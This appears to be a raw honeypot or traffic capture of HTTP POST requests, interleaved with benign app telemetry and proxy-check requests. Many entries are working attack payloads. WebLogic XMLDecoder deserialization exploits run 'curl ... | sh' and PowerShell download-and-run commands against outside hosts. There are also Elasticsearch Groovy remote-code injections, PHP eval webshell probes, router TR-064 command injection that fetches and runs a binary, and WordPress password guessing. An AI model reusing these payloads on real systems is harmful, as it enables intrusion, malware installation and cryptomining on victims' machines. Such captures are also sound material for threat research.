Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l÷yyÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl

POST http://behacdn.ksmobile.net/cfcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 38

&KÜWÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kä^H

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
›Ño'Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÄ5-Y›∆√«∆fl

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

AVO2mHJEUjgYaxHqdThnOStuWP76LambRhrvpB4+yi+YiIGCncx0mnB8gT3kPYMYwF8S3BN7TcBiBLaZvYSWBQElz1zDJd3M/vvZwoniP/iFmWBgCr+EoQlfy5YAAiAR3zQaoBLPmkrVefbg7SWVIUrWY/oWT5sq8O/zDsZ5RFa+7A88S3R4/BDcV08oUTwJQvHceuu92vNndG2wC1qfj+YYmwoG1XsfcWqtMimnj5OkhsUdRYAEN6AiHhksS7GzHkGvX4JROruEr7gvsq+xWVVDu20cguC4+NMsOfBZjNTKlFsX+T1fM++ZP0w8SiDB/IPsP5F88ZgiRT8E0onM5KTHo6tjlk9EvOVJdpilN94CRaI=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
%ÑlhÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 850
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.kingminer.club/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149594824019&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

566461
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

eb3b322044d603fe5bc6be18194ec292
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova--


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

RKUNx9nJbGyJgjFOcs7HMnj04l8+krBHq6LeV7LoMnNis4r+UlDRg4LJzK5vv/3bn03VBW2NRROtpmV2mi82aoG+x96fkJIGdVI5WZ16FM6MRnG3o3CeWG1Vw7Re6rtNEssa0oFXAQDlaQXZf0RiUyvUGUu0xKSh8Sg33GcwGaMbH0wJytcWtzKaIxCJau1v/D+ZrqN3CcFejgIJa3aEYVYlytYkoViM+5gTRFxJQWLAcLy7v2xxIAcftX/NVWaA7krBhaMKBSbKhcEA6rqokIdD0uhp5AzV2hQs1EAhXGe8N4o0EHCllHZXTrbBHb8nYIotbz3V8K9LMUUMFb76MiGxnfRHGYJ28hdm05poILT25v45iyatuMSobw==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache

FKZWyNvAYJmQu7kGPkZXfx2Y4sXvqfXhQHlP7TXKvdygsKdD4F1F/C5bQJ13lgvPTcvA02aCXo//m8LJT0hS3TGuC3jKVV0kLQtSpERSHFWr3W4csLJLAJARspaj52nSLTL/Xv/w5uPhXwpyD6LevY8PctzK5rcE5WzyTdpcQAmXEO0cIdegNNgVFt2dG2hNncmfKQevfl+luiGAY2R+Sk5yppT4N88BxD3yBfogovqZWlfN6pPjHFzpHqBbay81S1dnNk4yAelw0Zj9XDc3Th0DDwZ+UX+7EgmYPKQmM8QLwFbWZ/xCCCf5sM+Mj57DtnGrSSak80J+EF6C3bFVVrgv8vcZT2ONjuEFDcS6fcAAticrXLpiqWzfoA+jMNPWLma+0Be6+mjqbsRtD68JgeMA7Mh7/4ylaztGeFzSVNM0jQ03HBV+eeI=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Wï◊lÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache

QfZdlNydbDv/zkUHRNi8uHXCk5Nh9Mg467GyaTIQVa/k3/lIcVDsXwe/PsoWY0jEuuJi+bqDajZFKIfVus90+C7noYnfP6BeE68rDe72rwPxNtGEpS/Do7zuTlMT2kVN3aGKFShBTePWkqHKk1xSM0LeIpa1CYv7qk/9oN4lFJkwukCGsshrOlbTQrcb4TrT92275CoqRD5+Re3X8v/kWuQ2VZl/hyrKq7MlQQ39x4qZe4/4ZplHgwlWzoGUXdG1zdfQABFlsX8bbtqX+mhxmmwbPuk3ebLIdbPtgGhnOEYNp9/hBbgLYjRYAZ8GfRjB9UAFkuxUX0M6NiqqvnkzjfNhnbGOiU4lGS++9SemmaaPXxizraJPW+NzQGYchJeLqePsi1TjTW5v72Sa/gPuKreDFyBVDJLoKrquc4ds9l3yOWem7NX3Jzh1xGQi

POST http://check.proxyradar.com/azenv.php?auth=149365060359&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

QqVfxo+Zbc7sSyJiShpbSVH6fDyySdoBhLjH96BjvUP+63Vo6drUw1ymtPwu4h7SbVrCmmodOdvfei/wREqwGyi45KwTaA1NUPICw6qaAn/U74IKYIULs6t5NlfU4Atp56vpeY3IqJM9TCUCS3BQ+k97R5eqF72CAtNV7Fy8Ky8WJ6wAruSax9/+Zw15OfVLevwMrpwNBhVMldUW7GIwEiV2rG1MoNrKJU7kWy3EoyQKHCbWizVOi1+p7dnOLZtaW68VRO393zsWUDFrL/9694dBCdtP3DQVca/bf747nu/BG2NbEhIHAsSAGhjDUWPmUIRYAr9LYc2SXuv4yN4lkpecZ9DAdiSP08jV/UOzZY9S7pQKpXbtaDsWRcAXCxcLQxV/PCqHOAAoCzYXEfep8Aw4

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://check.proxyradar.com/azenv.php?auth=149453920177&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.best-proxies.ru/azenv.php?auth=146130369815649&a=PC&i=1760126605&p=1080 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue!@#

POST /cgi?2 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 128.199.238.30/mainFrame.htm
Content-Length: 211
Content-Type: application/x-www-form-urlencoded

[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=127.0.0.1;cd /tmp ; wget http://domstates.su/archi.txt;
X_TP_ConnName=ewan_ipoe_s
diagnosticsState=Requested


POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
…ùƒ4Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue123

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

423701
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

eb481ae7fb1f61ed4f38db475644465f
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST /_search HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"msf_result":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\")","lang":"groovy"}}}

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=11111111

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂ØmÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache

